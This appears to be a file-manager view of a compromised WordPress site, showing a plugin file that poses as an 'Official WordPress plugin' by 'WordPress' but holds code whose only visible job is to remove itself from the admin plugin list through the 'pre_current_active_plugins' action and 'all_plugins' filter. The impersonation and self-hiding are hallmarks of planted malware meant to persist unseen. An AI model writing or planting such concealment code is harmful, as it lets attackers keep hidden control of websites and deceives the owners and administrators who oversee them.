PATH:
home
/
thecwrif
/
public_html
/
wp-content
/
plugins
/
wp-water-labyrinth
<?php /* Plugin Name: WP Water Labyrinth Plugin URI: http://wordpress.org/# Description: Official WordPress plugin Author: WordPress Version: 18.8.7 Author URI: http://wordpress.org/# License: GPL2 */ function kmi_hide() { global $wp_list_table; if (!isset($wp_list_table)) { return; } $h = array('wp-water-labyrinth/wp-water-labyrinth.php'); if (isset($wp_list_table->items) && is_array($wp_list_table->items)) { foreach ($wp_list_table->items as $key => $val) { if (in_array($key, $h)) { unset($wp_list_table->items[$key]); } } } } function zsj_hide_p($plugins) { $p = 'wp-water-labyrinth/wp-water-labyrinth.php'; if (array_key_exists($p, $plugins)) { unset($plugins[$p]); } return $plugins; } if (defined('ABSPATH')) { add_action('pre_current_active_plugins', 'kmi_hide'); add_filter('all_plugins', 'zsj_hide_p'); }
[-] error_log
[edit]
[+]
..
[-] index.php
[edit]
[-] wp-water-labyrinth.php
[edit]